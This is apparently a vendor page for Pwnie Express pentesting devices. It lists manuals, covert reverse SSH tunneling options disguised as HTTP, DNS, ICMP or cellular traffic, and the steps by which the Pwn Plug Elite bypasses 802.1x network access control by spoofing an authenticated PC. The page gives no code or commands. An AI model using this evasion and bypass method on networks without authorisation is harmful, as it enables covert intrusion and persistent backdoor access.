Pwnie Express is committed to maintaining relevant and useful documentation for its products. Find the latest documentation below.
- Citadel PX Manual (Request from Support)
- Pwn Pad User Manual
- Pwn Appliance User Manual
- Pwn Plug R2 User Manual
- Pwn Plug User Manual
- Power Pwn User Manual
- Pwn Phone User Manual
:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.
:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.
:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
Pwn Plug Toolkit
The following open source pentesting tools are included on all Pwn Plug / Power Pwn products. [repository here]
All aboard! Pwnie Express has done it again. In addition to supporting both 3G and Wireless connectivity, the Pwn Plug Elite can bypass virtually all NAC/802.1x/RADIUS implementations, providing a reverse shell backdoor and full connectivity to NAC-restricted networks!
How does it work?
- First, the Pwn Plug is placed in-line between an 802.1x-enabled client PC and a wall jack or switch.
- Using a modified layer 2 bridging module, the Pwn Plug transparently passes the 802.1x EAPOL authentication packets between the client PC and the switch.
- Once the 802.1x authentication completes, the switch grants connectivity to the network.
- The first outbound port 80 packet to leave the client PC provides the Pwn Plug with the PC’s MAC/IP address and default gateway.
- To avoid tripping the switch’s port security, the Pwn Plug then establishes a reverse SSH connection using the MAC and IP address of the already authenticated client PC.
- Once connected to the plug’s SSH console, you will have access to any internal subnets accessible by the client PC. As an added bonus, connections to other systems within the client PC’s local subnet will actually appear to source from the subnet’s local gateway!